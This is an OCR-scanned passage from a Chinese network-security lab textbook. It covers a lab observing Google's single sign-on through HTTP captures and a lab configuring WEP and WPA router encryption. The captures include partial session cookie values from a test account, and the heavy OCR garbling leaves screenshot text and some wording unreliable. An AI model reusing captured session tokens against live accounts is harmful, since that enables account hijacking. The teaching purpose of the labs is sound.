SSO 的 定义 是 在 多 个 应 用 系统 中 ， 用 户 只 需要 登录 一 次 就 可 以 访问 所 有 相互 信任 的 应 用 
系统 。 它 包括 可 以 将 这 次 主要 的 登录 映射 到 其 他 应 用 中 用 于 同一 个 用 户 的 登录 的 机 制 。 
当 用 户 第 一 次 访问 应 用 系统 1 的 时 候 ， 因 为 还 没有 登录 ， 会 被 引导 到 认证 系统 中 进行 登 
oR; 根据 用 户 提供 的 登录 信息 ， 认 证 系统 进行 身份 校 验 ， 如 果 通 过 校 验 ， 应 该 返回 给 用 
户 一 个 认证 的 凭据 一 一 ticket， 用 户 再 访问 别 的 应 用 的 时 候 就 会 将 这 个 ticket 带 上 ， 作 为 
自己 认证 的 凭据 ,应 用 系统 接收 到 请 求 之 后 会 把 ticket 送 到 认证 系统 进行 校 验 ,检查 ticket 
的 合法 性 。 如 果 通 过 校 验 ， 用 户 就 可 以 在 不 用 再 次 登录 的 情况 下 访问 应 用 系统 2 和 应 用 
系统 3 了 。 


【实验 环境 】 

Web 浏览 器 与 相应 的 HTTP 分 析 器 CE 浏览 器 用 户 可 以 使 用 HttpWatch, Firefox jl 
览 器 用 户 可 以 使 用 HttpFox )。 

【实验 步 又 】 

(1) 打开 Web 浏览 器 ， 启 动 HTTP 分 析 器 ， 并 开始 记录 HTTP 数据 。 

(2) 在 地 址 栏 中 输入 “http://mail.google.com”。 观 察 HTTP 分 析 器 记录 的 内 容 ， 可 
以 看 到 地 址 被 更 改 到 http://mail.google.com/mail， 如 图 14-35 所 示 。 


2) Ht t pF ox 


[v] Autoscroll 


356 (1150) GET 
ies|Query String) POST Data | Content 


ist Hee! Value Response H- Value 
lequest-Li- GET / HITP/1.1 Gtatus-Line) MITP/1.1 200 OK 
mail. google. con Cache-Control private, max-age=604800 
Mozilla/S.O Windows NT S.1; rw:…| Expires Sat, 06 Aug 2011 06:32:20 GNT 


text/html, application/xhtml+xml, | Date Sat, 06 Aug 2011 06:32:20 GUT 
7 zhen, zh; q=0.5 

grip, deflate 

GB2312, ut£-8; q-0. 7, *; q=0.7 

115 


图 14-35 ”网 址 更 改 
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GO 由 于 本 机 没有 登录 过 Gmail， 因 此 请 求 被 


7) HttpFox 


D Start 


X Cler 所 
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定向 到 主 站 点 ， 如 图 14-36 所 示 。 
加 加 加 


[V] Autoscroll 


| Started 
(00:01:41,350 
1.864 


00:01:41. 906 


Tine Sent Received Method Rese Type VRL 


0.496 345 497 GET 
0.176 326 1437 GET 


0.152 356 (1150) GET 


(Aboe text/html  http://mail. google. com/ 
200 ^ imege/x- 


Headers | Cookies | Query String|POST Data| Content 


Request He 
(equest-Li-- 
Host 
User-Agent 
Accept 
Accept-Lange* 
Accept-Enco™ 
Accept-Char-** 
Keep-Alive 
Connection 
Referer 


这 个 域 下 的 Cookie. 


Value 

GET fmail/ MITP/1.1 

mail. google. com 

Mozilla/S.O Windows NT 5.1; rv 
text/html, application/xhtml+xml-+- 
zh-cn, zh; q=0.5 

grip, deflate 


GB2312, ut£-8;: q70. 7, *:q20. T Location https://www. google. con/accoun 


us 
keep-alive 
http: //nail. google. com/ 


| Response H- Value ] 
(Status-Line) HITP/1.1 302 Moved Temporarily ^| 
Content-Type text/html; charset=UTF-8 
Cache-Control no-cache, no-store, max-age=0+++ 
Fraga no-cache 

Expires Fri, 01 Jan 1990 00:00:00 GHT 

Date Sat, 06 Aug 2011 06:32:21 GMT 


Content-Len** 423 
X-Content-T** nosniff 
X-Frame-Opt--* SAMEORIGIN 
X-XSS-Prote* 1; mode=block 


图 14-36 请求 被 重 定向 到 主 站 
(4) 查看 这 时 本 地 保存 的 Cookie, 如 图 14-37 所 示 , 这 时 本 地 保存 的 只 有 google.com 


站 点 


了 google. com 
L] google. com 
] google. con 
L) google. com 
| google. com 
] google. com 
| google. com 
] google. com 
J] google. con 
L] google. com 
] google. com 
| google. com 
[L google. com 


^ Cookie 名 称 


GIIAIL KIT 
GoogleAccountsLocale session 
GAPS 

GALX 

一 Qtma 

一 atmb 

—utme 

tar 

NU 

uted 

tac 

utnz 


utar 


图 14-37 保存 的 Cookie 


(5) 输入 用 户 名 和 密码 ， 登 入 Gmail， 如 图 14-38 所 示 。 


超大 空间 


减少 垃圾 邮件 


Google 提供 的 电子 邮件 服务 。 


Gmail 的 开发 理念 是 ， 电 子 邮件 可 以 更 加 直观 、 高 效 而 实用 ， 甚 至 可 能 很 有 趣 。Gmail 具有 以 下 特点 : 
超过 7612.260370 MB (还 在 不 断 增 加 ) 的 免费 存储 空间 。 


阻止 不 需要 的 邮件 进入 您 的 收 件 箱 。 


Google 账户 
用 户 名 :|ssoexper 
20: pat@example.com 


ED: leccccecce 
口 保持 登录 状态 


图 14-38 


登录 Gmail 


(6) 观察 HTTP 分 析 器 的 记录 ， 可 以 看 到 主 站 为 用 户 设置 了 Cookie， 并 将 用 户 地 址 
重 定向 回 Gmail 进行 下 一 步 认证 ， 如 图 14-39 和 图 14-40 所 示 。 
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加 回国 


[v] Autoscroll 


Received Method Ress Type 


o 02:18.817 — 21.534 339 GET Redirect- https: //mai-"Dgnail. com 
[00:02:28.051 — 0.52 1314 POST applicat" http: //ocsp. thawte. com/ 
[00:02:40.379 — 13.881 1214 331 GET (bow text/html  https://nai-"il/?shve-l 


Headers | Cookies Query String|POST Data|Content 


| Cookie Sent Value Path Domain Expires | 
utne 173272373 Jaccous google.com End Of Session ^| 
utar 173272373. 1312612350. 1. 1. ut=+ /accou* . google.con 201282 ASA 2:32:29 | 
GAPS 1:hSTnC18r1pEENerCOPMnLDg4R- /accou www. google. com 20138 ASH 14:32- 
ALK BINZ3QkRiNQ faccou wre. google, con End Of Session 

GIMIL LOGIN T13126123491217131261234912… / google.com End Of Session x| 


Cookie Received Value Path Domain Expires 
SID DQAAAIgAAABurS cSOPbTrK5vOsA-- / www. google. End Of Session ^ 
XSID AwHF julMXIwISzxiE if www, google. End Of Session 

SSID AI3iEJTx20vQCMAUm 7 google.com End Of Session 

LSID mail: DQAAAToAAABCulyi_SeGln-++ / google.com End Of Session 
|GAUSR mail: ssoexper@gnail. con / google.com End Of Session 


^) HttpFox 


00:02:18.817 — 21.534 302 Redirect https://nai*"Ügnail. con 
00:02:26.051. 0.528 1314 POST 200 applicat- http://ocsp. thawte. com/ 
00:02:40.379 — 13.881 1214 331 GET (Abor: text/html  https://nai-il/?shva-l S 


Headers |Cookies|Query String|POST Data Content 


Request He Value | [Response He) Value 

(Request-Li- POST /accounts/ServiceLoginAus ^| |(Status-Line) HITP/1.1 302 Moved Temporarily ^ 
Host www. google. com Content-Type text/html; charset=UTF-6 
User-Agent — Mozilla/S.O (Windows NT 5.1; P3P CP="This is not a PSP policy!" 
Accept text/html, application/xhtmltx- Set-Cookie  GAPS=1:IPDc_z0A4tZUQSehLSHLGd+ 
Accept-Lang zh-cn, zh; q-0.5 Set-Cookie — SID-DQAAAIgAAABurScSOPbTrKBvE--- 
Accept-Enco* grip, deflate Set-Cookie  HSID=AwHF julMXIwI8zxiE:Donain*"" 
Accept-Char-* GB2312, ut £-8; q=0. T, *; q0. T Set-Cookie — SSID-AISiEJTx20vQCHAUn: Domai 
Keep-Alive — 115 Set-Cookie — LSID-mail:DQAAAIoAMABCulyi Be* 
Connection keep-alive Set-Cookie — GAlSR-nail:ssoexperügnail. com- 
Referer https://www. google. com/accoun*s — on https: //nail. google. con/mail, 
Cookie GoogleAccountsLocele_session= 加 ezip 


as 4st e 2 L ea aons oan onanirao com Y 


图 14-40 [E] Gmail 


(7) 用 户 重新 回 到 Gmail Ja, Gmail 对 用 户 认 证 ， 成 功 后 Gmail 将 为 用 户 设 置 
Cookie， 并 将 用 户 转 到 自己 的 邮箱 ， 如 图 14-41 和 图 14-42 所 示 。 

(8) 查看 这 时 本 地 保存 的 Cookie, WE 14-43 所 示 ， 这 时 本 地 保存 的 有 google.com 
和 mail.google.com 这 两 个 域 下 的 Cookie. 

(9) 在 地 址 栏 中 输入 “http://www.orkut.com”。 由 于 本 机 没有 登录 过 Orkut, 
求 被 重 定向 到 主 站 点 ， 如 图 14-44 所 示 。 
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2) Htt pF ox 
p» Start 


[V] Autoscroll 


Started 


00:02:40. 373 331 GET 


1314 POST 200 


Received Method Rese Type URL 
694 POST 302 


Redirect» https://www*eLoginÀuth ^ 


http: //ocsp. thawte. con/ 
" text/html  https://mai-il/?shva-l M 


Headers | Cookies | Query String! POST Data|Content 


Cookie Sent Value 

GMAIL LOGIN T1312612349121/131261234912--- 
SID DQAAAT gAAABurS cSOPbTr KBvOsÀ--- 
HSID AwHF julNXIwISzxiE 

SSID AI3i EJTx20vQCMAUm 


| Cookie Received Value 


Path Domain Expires 
End Of Session 
End Of Session 
End 0f Session 


End Of Session 


7 google. com 
/ google. con 
7 google, com 
/ google. con 


Path Domain Expires 


DQAAAT SAAABPOOTM1 ayy2WHGZNI--- /mail 
gnai l=nT vf fE3vMQNISwBTCPGN4-++ /mail 
AFÉbupNQvQXeT limSEqi ru4oT1-*- /mail 


mail. google." End Of Session 
mail. google." End Of Session 
mail. google." End Of Session 


图 14-41 Gmail 设置 Cookie 


7) BttpFox 


D Start 
Started 


Autoscroll 

Res… Type VRL 

302 Redirect** https: //www**eloginAuth ^ 
https: //ma 


Ügnail. com 
= http: //ocsp. thawte. com/ 
(bors text/html https: //maivil/?shve=l | 


| Response H-- Value 
(tatus-Line) HITP/1.1 302 Moved Temporarily ^ 
Content-Type text/html; charset-UTF-8 
Set-Cookie GX=DQAAAT SAAABPOOTM ayySWHGZN--- 


Host mail. google. com 

User-Agent Morilla/S.O (Windows NT 5.1; rv 
text/html, application/xhtml+xml- | (Set-Cookie 
Accept-Lang™ zh-cn, zh; q=0.5 Set-Cookie 
Accept-Enco- grip, deflate FSP 
Accept-Char… GB2312, ut £-8; q70. 7, *; q=0.7 
Keep-Alive — 115 

Connection 


Accept 


CP="This is not a P3P policy! 
Cache-Control no-cache, no-store, max-ag 

Praga 
Expires 


no-cache 

Fri, 01 Jan 1990 00:00:00 GMT 
Sat, 06 Aug 2011 06:33:19 GMT 
https: //mail. google. com/ 


keep-alive 
https://www. google. com/accountse: | Date 


GMAIL L0GIN-T1312612349121/1312*- | [Location 


定向 回 邮 箱 


^ Cookie 名 称 


google. com 


|] mail. google. com s 
|. mail. google. com ex 
|. mail. google. com GMAIL AT 

] mail. google. com jscookietest 

] mail. google. com GMAIL IMP 

] mail. google. com GIAIL STAT 3326 
(mail. google. con GMAIL IMP 
|. | mail. google. com GMAIL IMP 

] mail. google. com gnailchat 

] mail. google. com GMAIL IMP 


14-43 ”保存 的 Cookie 
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el 


v| Autoscroll 


Received Method 


00:03:00. 194 
993 GET 
1393 GET 
433 GET 


Headers Cookies|Query String) POST Data| Content 


Rese- Type 
http://www. orkut. comf 
https://www 
image/x- https://www 


text/html http://w. 


2 Redirect… 
(bows text/html 
200 

_ (be 


Value 
* GET / HITP/1.1 
www. orkut, com 
Mozilla/5.0 (Windows NT 5.1; 
text/html, application/xhtmltxml-++ 
Accept-Lang* zh-en, zh; q=0.5 
Accept-Enco grip, deflate 
Accept-Char-** GB2312, ut£-8; q=0. 7, *;q70. T 
115 
keep-alive 


i 


User-Agent re 


Accept 


Keep-Alive 
Connection 


图 14-44 


(10) 由 于 之 前 已 经 登录 过 主 站 ， 因 此 浏 


用 户 更 新 Cookie， 如 图 14-45 所 示 。 


7) HttpF ox 
D Start 


Response Hee Value 
Gtatus-Line) HITP/1.1 302 Moved Temporarily 
Set-Cookie 


| 
signupState=; Domain=www, orku 
text/html; charset=UTF-8 
https://www. 
Content-Ene…。 gzip 

Date Sat, 06 Aug 2011 06:33:40 GMT 
Sat, 06 Aug 2011 06:33:40 GMT 
Cache-Control priva! 


Content-Type 


Location 'oogle. com/ accoun-** 


Expires 
max-age=0 
X-Content-T- nosni f£ 
X-Frane-Üpt- SAMEORIGIN 
X-XSS-Prote 1; mode=block 


请 求 被 重 定向 到 主 站 


| 览 器 将 相关 的 Cookie 发 送 给 主 


v| Autoscroll 


| Started 
(00:03:00. 194 623 GET 
00:03:01. 472 
00:03:01. 488 


0.230 
0.853 


1383 GET 
433 GET 


Headers | Cookies Query String|POST Data|Content 
Value 

mail:ssoexperügmail. com 
DQAAAIgAAABurScSOPbTrK5v6sA--- 
AwHF julMXIwISzxiE 


AI3iEJTx20vQCMAUm 
ID-T6fddla88b62613c: FF=0: NW--- 


| Cookie Sent 
GAUSR 

SID 

HSID 

SSID 

PREF 


Received Method 


Res… Type URL 


Redirect http://www. orkut. com/ 


(bors text/html http://www. -"-fE3BbZyb2c V. 


Path | Domein Expires 

faccouss www.google.com End Of Session 
7 . google. End 0£ Session 
7 google. End 0£ Session 
/ google. End 0£ Session 


y google. 201358 ASA 14:334 yw 


com 


com 


com 


com 


Value 
zh CH 


| Cookie Received 
Googl eccountsLoc*** 
sm 


Path 
f www. google 


Domain Expires 
com End Of Session 


com End Of Session 


GAPS 
LSID 


IQAARIgAMCLujX-svFJe3LHcXB*-- / . google. 
1: dBQKSOhhzvekqBZosU, uJaw jre++ / 
mail |orkut. US:DQAAAToAAABCu'… / 


com End Of Session 


n 
www. google 
n 


. google. 


com End Of Session 


(aD 


浏览 器 转 回 


图 14-45 主 站 设置 Cookie 


Orkut，Orkut 对 用 户 进行 认证 ， 并 设置 相应 的 Cookie， 如 图 14-46 


和 图 14-47 所 示 。 可 以 看 到 ， 这 时 用 户 已 经 成 功 登 录 到 Orkut， 并 没有 再 一 次 输入 用 户 名 
和 密码 ， 即 完成 了 单 点 登录 。 
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ns 第 ]4 章 Web 安全 mem 


2) HttpFox 


D Start 3 5 [V] Autoscroll 

Started Received Method ^ Res-* Type 

00:03:01. 488 text/html http://www. - 

00:03:01. 599 (1150) GET (Cac image/x-- https://www" 

00:03:02. 351 736 GET 200 ^ applicat" http://www. …avicon ico 
00:03:02. 368 34T GET (Abo text/html http://www. t. com/Main ¥ 
Meaders|Cookies Query String | POST Data| Content 


Parameter Value 
msg 0 
page http://www. orkut. com/Home 
pli 1 
auth DQAAAIMAAADANpVe1 uBVDSHRU exP qeDhzP tpzUnVU; JERSSy1 pkT zGcgRPOoB5So-zirz4MZu:-- 


图 14-46 Orkut 认证 用 户 


7) HttpF ox 


Autoscroll 


00:03:01. 599 (1150) GET 

00:03:02. 351 0.673 1148 736 GET applicate http://www 

00:03:02.368 7.601 1433  MTGET (Abos text/html http://www. st. com/Main | 
Headers Cookies | Query String) POST Data Content 


Cookie Sent Value Expires 


Cookie Received Value Path Domain Expires 

locc GC-DQAAAISAAADRIDSoLKHLRWiQ--- / www. orkut. com End Of Session 
orkut_state 5850155381168--- / www. orkut. com End Of Session 
orkut_state j=75660155381168… / www. orkut. com End Of Session 


图 14-47 Orkut 设置 Cookie 


(12) 查看 这 时 本 地 保存 的 Cookie, 如 图 14-48 所 示 , 这 时 本 地 保存 的 有 google.com, 
mail.google.com 和 orkut.com 这 三 个 域 下 的 Cookie. 


【实验 报告 】 
(1) 详细 描述 实验 过 程 ， 分 析 Google 单 点 登录 的 详细 过 程 。 
(2) 登录 Google 的 其 他 服务 ， 查 看 是 如 何 进 行 单 点 登录 的 。 
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站 点 a Cookie 名 称 


Œ (mail. google. com 
5 C jerkut. com 


|] orkut. com ose 
|] orkut. com orkut_state 
|] orkut. com T 

|] orkut. com frame 

|] orkut. com Os 


图 14-48 ”保存 的 Cookie 
【思考 题 】 


CD. 分 析 单 点 登录 的 优 缺 点 。 
(2) 分 析 单 点 登录 中 可 能 存在 的 安全 问题 。 
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第 15 Fe 
无 线 网 络 安全 


无 线 局 域 网 (Wireless Local Area Network, WLAN) 具有 移动 性 、 安 装 简单 、 高 灵 
活性 和 易 扩展 等 特点 ， 作 为 传统 有 线 网 络 的 延伸 ,广泛 地 应 用 于 各 种 网 络 环境 中 。 但 是 ， 
无 线 网 络 技术 在 带 来 极 大 方便 的 同时 ， 也 引发 了 许多 信息 安全 风险 和 威胁 。 

本 章 通过 无 线 局 域 网 安全 配置 实验 (WEP 和 WPA)， 实 现 对 无 线 网 络 安全 进行 加 密 
配置 , 提高 无 线 网 络 的 安全 性 ; 同时 通过 WEP 口令 破解 实验 , 加 深 对 WEP 原理 的 理解 ， 
了 解 WEP 安全 机 制 的 漏洞 。 


454 ”无 线 局 域 网 安全 配置 


15.1.1 WEP 
【实验 目的 】 


通过 在 对 无 线路 由 器 中 WEP 安全 机 制 的 配置 ， 加 深 读 者 对 WEP 原理 及 其 加 密 方式 
的 理解 ， 了 解 WEP 安全 机 制 的 缺点 与 不 足 。 


【原理 简介 】 

WEP (Wired Equivalent Privacy) 即 有 线 等 价 保密 协议 ， 是 源 自 于 RC4 数据 加 密 技 
术 ， 用 以 满足 用 户 更 高 层次 的 网 络 安全 需求 。WEP 通过 对 在 两 台 设 备 间 无 线 传输 的 数据 
进行 加 密 ， 以 防止 非法 用 户 窃 听 或 侵入 无 线 网 络 。 

WEP 是 1999 年 9 月 通过 的 IEEE 802.11 标准 的 一 部 分 ， 使 用 RC4 流 密码 加 密 技术 
达到 机 密 性 ， 并 使 用 CRC-32 校 验 和 达到 资料 正确 性 。 标 准 的 64b WEP 使 用 40b 的 密 钥 
接 上 24b 的 初 向 量 〈Initialization Vector, IV) 成 为 RC4 用 的 密 钥 。 在 起 草原 始 的 WEP 
标准 的 时 候 ， 美 国政 府 在 加 密 技术 的 输出 限制 中 限制 了 密 钥 的 长 度 ， 一 旦 这 个 限制 放宽 
之 后 ， 所 有 的 用 户 都 能 够 用 104b 的 密 钥 实现 128b 的 WEP 扩展 协议 。 用 户 输 入 128b 的 
WEP 密 钥 的 方法 一 般 都 是 用 含有 26 个 十 六 进 制 数 (0~9 和 A FO 的 字 串 来 表示 ， 每 
个 字符 代表 密 钥 中 的 4b， 则 4X26 = 104b， 再 加 上 24b 的 IV 就 成 了 所 谓 的 “128b WEP 
密 钥 ”。 有 些 厂商 还 提供 256b 的 WEP 系统 , 就 像 上 面 讲 的 , 24b 是 IV, KERER F 232b 
作为 保护 之 用 ， 典 型 的 做 法 是 用 58 个 十 六 进 制 数 来 输入 ， 即 232b + 24b = 256b. 

WEP 有 两 种 认证 方式 : 开放 式 系 统 认 证 (Open System Authentication) 和 共有 键 认 
iE (Shared Key Authentication )。 其 中 开放 式 系统 认证 ， 不 需要 密 钥 验证 就 可 以 连接 。 共 
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有 键 认证 客户 端 则 需要 放送 与 接 入 点 预存 密 钥 匹配 的 密 钥 。 共 有 键 一 共有 以 下 4 个 步骤 。 

(1) 客户 端 向 接 入 点 发 送 认证 请 求 。 

(2) 接 入 点 发 回 一 个 明文 。 

G) 客户 端 利用 预存 的 密 钥 对 明文 加 密 ， 再 次 向 接 入 点 发 出 认证 请 求 。 

(D 接 入 点 对 数据 包 进 行 解密 ， 比 较 明文 ， 并 决定 是 否 接 受 请 求 。 

综 上 所 述 ， 共 有 键 认证 的 安全 性 高 于 开放 式 系统 认证 。 

密 钥 长 度 不 是 WEP 安全 性 的 主要 因素 ， 破 解 较 长 的 密 钥 需要 拦截 较 多 的 封包 ， 但 
是 有 某 些 主动 式 的 攻击 可 以 激发 所 需 的 流量 。WEP 还 有 其 他 的 弱点 ， 包 括 IV 雷同 的 可 
能 性 和 变 造 的 封包 ， 这 些 用 长 一 点 的 密 钥 根本 没有 用 。 因 为 RC4 是 Stream Cipher 的 一 
种 ， 同 一 个 密 钥 绝 不 能 使 用 两 次 ， 所 以 使 用 (虽然 是 用 明文 传送 的 ) IV 的 目的 就 是 要 避 
免 重复 ; 然而 24b 的 IV 并 没有 长 到 足以 担保 在 忙碌 的 网 络 上 不 会 重复 ， 而 且 IV 的 使 用 
方式 也 使 其 可 能 遭受 到 关联 式 密 钥 攻击 。 


【实验 环境 】 


(1) 带 有 无 线 网 卡 的 计算 机 两 台 。 
(2) 带 有 WEP 功能 的 无 线路 由 器 一 台 《〈 本 书 以 H3C WAP500a/g 无 线路 由 器 为 例 )。 


【实验 步骤 】 
CD 将 无 线路 由 器 恢复 到 出 三 设置 ， 并 打开 。 
(2) 打开 计算 机 的 无 线 网 络 连接 ， 在 无 线 网 络 列表 中 可 以 看 到 无 线路 由 器 信息 ， 显 
示 为 未 设置 安全 机 制 的 无 线 网 络 ， 如 图 15-1 所 示 。 
| 网 络 任务 选择 无 线 网 络 
LE SEU PAR PATA EERE MEMES (0. 
2 PE [ 人 TAP500g 自动 dei 
未 设置 安全 机 制 的 无 线 网 络 EN 
EI 
i TETRA 
v 更 改 首 选 网 络 的 顺序 
cj Sem 


FA 15-1 无 线 网 络 连接 


(3) 双击 连接 无 线路 由 器 ， 打 开 浏 览 器 登录 到 默认 的 无 线路 由 器 的 配置 页 面 ，H3C 
WAP500 路 由 器 的 默认 配置 页 面 地 址 为 : 192.168.1.100。 选 择 Wireless Security 一 802.11G 
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Security, WI 15-2 所 示 ， 现 在 的 Security Mode 选项 为 Open System, Cipher Type 为 
Disable， 说 明 当 前 为 未 采用 安全 机 制 的 无 线 网 络 。 


802.11A RADIUS Server ^ Access Control 


802.116 Security 
Security Mode. € Open System © Shared Key © 802.1x 
C wPA-PSK C WPA 


Cipher Type. € Disable C wep © aes € TKIP © Auto 


e € 


FE [SY] ES 


è E ë D EK 
‘ i ë 
: — ë 
s | Mon 1] 
MDA Passohrase ————— — — 
= 


图 15-2 无 线路 由 器 配置 页 面 


(4) 现在 对 路 由 器 进行 WEP 配置 。 在 Cipher Type 选项 中 选择 WEP. YE PassPhrase 
一 栏 中 输入 密码 , 路 由 器 提供 了 十 六 进 制 和 ASCH 码 两 种 输入 方式 , 密码 长 度 分 为 64bit， 
128bit, 152bit 三 种 ， 如 图 15-3 所 示 。 


802.11G RADIUS Server Access Control 


C WPA-PSK C WPA 


Cipher Type C Disable © wep © AES € TKIP © Auto 
Key Entry Method C Hexadecimal © Ascii Text 
PassPhrase 123456 64bit =] Generate 

128 bit 
Default key Encryption Key 452 bit |Key Length 
C a 613+ 64 bit (10 hex digits/ 5 ascii keys) =] 
© 2. TSJ [G4 bit (10 hex digits/ 5 ascii keys) 司 
O 3. JURACS 64 bit (10 hex digits/ 5 ascii keys) 加 
O 4. IKNEn [64 bit (10 hex digits’ 5 ascii keys) 辐 


图 15-3 WEP 加 密 配置 一 


输入 完成 后 ， 单 击 Generate 按钮 ， 系 统 会 生成 4 个 Default Key， 任 意 选 取 一 个 
即 为 登录 时 需要 输入 的 密码 。 也 可 直接 选择 一 个 Default Key， 在 其 后 的 对 话 框 中 输 
入 自己 希望 的 登录 密码 , 同样 得 提供 了 64bit、128bit、152bit 三 种 密码 长 度 , 如 图 15-4 
所 示 。 

(5) 配置 完成 后 单 击 下 方 的 Apply 按钮 , 再 单 击 REBOOT AP 重启 路 由 器 完成 配置 。 

C6) 这 时 再 次 打开 计算 机 的 无 线 网 络 连接 , 在 网 络 列表 中 可 以 看 到 无 线路 由 器 信息 ， 
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802.11A RADIUS Server Access Control 


C wPA-PSK © WPA 


Cipher Type C Disable € WEP © AES © TKIP © Auto 

Key Entry Method © Hexadecimal © Ascii Text 

PassPhrase [e+ bt =] Generate 

Default key Encryption Key Key Length 

G i 12345 64 bit (10 hex digits/ 5 ascii keys) =] 


C 2 
© 3. 
C 4 


) 
64 bit (10 hex digits/ 5 ascii keys) 


LLL RADIUS Sever Setting | 
cance 
图 15-4 WEP 加 密 配置 二 


如 图 15-5 所 示 ， 显 示 为 启用 安全 的 无 线 网 络 。 单 击 【 连 接 】 按 钮 ， 弹 出 一 个 对 话 框 ， 提 
示 需 要 输入 WEP 密 钥 。 输 入 刚刚 设置 的 密码 12345， 连 接 成 功 。 


网 络 任务 — | 选择 无 线 网 络 

PE HSUPA PAT BLUSE BLA ROCA FOR REESE LR 0D. 
EE E TON 

相关 任务 

i) 了 解 无 线 网 络 


oy ARRAS 
Ln M (也 称 作 WEP SEL "PA SHD. PIREU 
“Wi p" A 日 
[oi d 


网 络 密 钥 0 - I 
PUPS = 


图 15-5 启用 WEP 加 密 后 的 无 线 网 络 连 接 


(7) 本 机 对 百度 主页 进行 ping 操作 ， 如 图 15-6 所 示 。 


在 另 一 台 机 器 上 使 用 OmniPeek 对 本 机 数据 进行 抓 包 《使 用 方法 见 15.2.3 节 )。 抓 取 
数据 如 图 15-7 所 示 。 可 以 看 到 数据 均 已 经 过 加 密 。 
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Documents and 


Pinging www.a.shifen.com [119. 
119.7 
119.75 
119.7 
119 
119.7 
119 
119 
119 
119. 
119 
119 
119 
119 
119 
119 
119. 


from 
from 
from 
from 
from 
from 
from 
from 
from 
from 
from 
from 
from 
from 
from 
from 


75.21 


Settings \chutou>ping — 


7.561 with 


CATT A M 8000000 二 
File Edit View Go Capture Analyze Statistics Telephony Tools Help 
Gao ow a@ax2ealn DFZ sjqqaaBpiwmmsxi! 
© Eepression.. Clear Apply 
[Source + [Destination [Protocol [Info 


+ 60175895 Hangzhou. 03:7 Broadcast 
760 5.16183090 Hangzhou. 03:7. Broadcast 
023956 Hangzhou. 03 : 7: Broadcast 

5 3. 72823715 Hangzhou. 03:7 Broadcast 
743 5.05936622 Hangzhou. 03:7! Broadcast 


+ 52343559 Hangzhou. 0: 
72182655.Hangzhou. 0 
49938392 Hangzhou. 0: 
. 00507354 Hangzhou. 03: 
.1137 Hangzhou. 0 
8. 03120803 Hangzhou. 0: 


Broadcast 
Broadcast 
Broadcast 


IEEE 
IEEE 
IEEE 
IEEE 
IEEE 


BC Bea: SN=495, FN-0, 


IEEE 
IEEE 
IEEE 
IEEE 
IEEE 
IEEE 


frame, 


frame, 


本 Frame 818: 77 bytes on wire (616 bits), 
四 802.11 radio information 

8 IEEE 802.11 Beacon frame, Flags: P 
s IEEE 802.11 wireless LAN management frame 


77 bytes captured (616 bits) 


TIT 


图 15-7 经 


各 无 线路 由 器 的 WEP 加 密 取 消 


进行 对 比 。 未 经 WEP 加 密 的 数据 如 " 15- 
行 了 保护 。 

【实验 报告 】 
简 述 WEP 的 工作 原理 。 


(D 
(2) 
(3) 


r1 
Eo 


说 明 详 细 配 置 ; 
实现 验证 WEP 加 密 。 


80 00 OF e2 03 7e 2c 
00 46 06 d5 02 00 00 00 00 
64 00 00 00 00 00 01 08 82 
84 01 Ob 05 04 00 01 00 00 
2a 6c 00 00 00 00 =| 


WEP 加 密 的 密 文 数据 包 


BR 
UA 


再 次 通过 OminPeek 抓 取 未 经 过 WEP 加 密 的 数据 ， 
8 所 示 。 两 者 对 比 可 以 看 出 WEP 对 无 线 数据 进 
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zaxi 


File Edit View Go Capture Analyze Statistics Telephony Tools Help 
aAA SAXFA ru pipes: M 
Filter: Expression... Clear Apply 


Yo. Tine Source < [Destination Protocol [Info 到 
TOTS EC I PL NURSES, NESJE OSAF 


824 14. 971088 119. 75. 218. 45 192. 168. L 98 ICMP Echo (ping) reply 
483 8.970547  119.75.218.45 192.168.1.98 ICMP Echo (ping) reply 
542 9.971869  119.75.218.45 192.168.1.98 ICMP Echo (ping) reply 
2594 45 chi ng) reply 


641 11.971265 119.75 


45 Echo (ping) reply 


154 2.970406  119.75.218.45 192.168.1.98 ICMP Echo (ping) reply 


871 15.970398 119.75.218.45 192.168.1.98 ICMP Echo (ping) reply 
108 1.971216  119.75.218.45 192.168.1.98 ICMP Echo (ping) reply 
1135 19.971735 119.75.218.45 192.168.1.98 ICMP Echo (ping) reply 
1n71 1a O71RS 110 75 918 AS 309 1421 on Tmo ceha fninny nanti s 


[O00 08 02 2c 00 e0 05 c5 7c ab Ga 00 OF e2 03 Fe 2C n., s 
oolo fO 7d 68 c2 16 73 40 88 aa aa 03 00 00 00 08 00 jh 
E..« 


[0030 B rH gu 62 00 00 b5 54 02 00 9e 07 61 62 63 64 eB ... abcd 
|0040 7 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 efghijkl anoparse 
[050 23 s 3 61 62 63 64 65 66 67 68 69 uvwabcde fghi 


图 15-8 未 经 WEP 加 密 的 明文 数据 包 


请 结合 身边 常用 的 无 线路 由 器 ， 进 行 一 次 WEP 配置 。 
15.1.2 WPA 


【实验 目的 】 
通过 在 Windows 环境 下 对 无 线路 由 器 WPA 的 配置 ,使 读者 认识 到 WPA 相对 于 WEP 
加 密 方 式 的 优点 ， 进 一 步 掌 握 如 何 对 无 线 网 络 安 全 进行 配置 。 


【原理 简介 】 

WPA (Wi-Fi Protected Access)， 即 Wi-Fi 安全 存 取 技 术 。 它 是 应 研究 者 在 前 一 代 有 
线 等 效 加 密 WEP》 中 找到 的 几 个 严重 的 弱点 而 产生 的 。 

WPA 实现 了 IEEE 802.11i 标准 的 大 部 分 , 是 在 802.11i 完备 之 前 替代 WEP 的 过 渡 方 
案 。 该 标准 的 数据 加 密 采 用 TKIP (Temporary Key Integrity Protocol)， 认 证 有 两 种 模式 
可 供 选 择 , 一 种 是 使 用 802.1x 协议 进行 认证 ; 一 种 是 称 为 预先 共享 密 钥 PSK CPre-Shared 
Key) 模式 。 

WPA 相对 于 WEP 的 主要 改进 就 是 在 使 用 中 可 以 动态 改变 密 钥 的 “临时 密 钥 完整 性 
协定 ”(Temporal Key Integrity Protocol，TKIP)， 加 上 更 长 的 初 向 量 ， 这 可 以 避免 针对 
WEP 密 钥 的 攻击 。 除 了 认证 与 加 密 外 ，WPA 对 于 所 载 资料 的 完整 性 也 提供 了 巨大 的 改 
Xt. WPA 使 用 了 “Michael” 的 信息 认证 码 〈 在 WPA 中 叫 作 信息 完整 性 查核 ，MIC) 更 
加 安全 可 靠 。 此 外 ，WPA 使 用 的 MIC 包含 帧 计数 器 ， 以 避免 回放 攻击 的 利用 。 

在 WPA 的 设计 中 要 用 到 一 个 802.1X 认证 服务 器 来 散布 不 同 的 密 钥 给 各 个 用 户 ; 
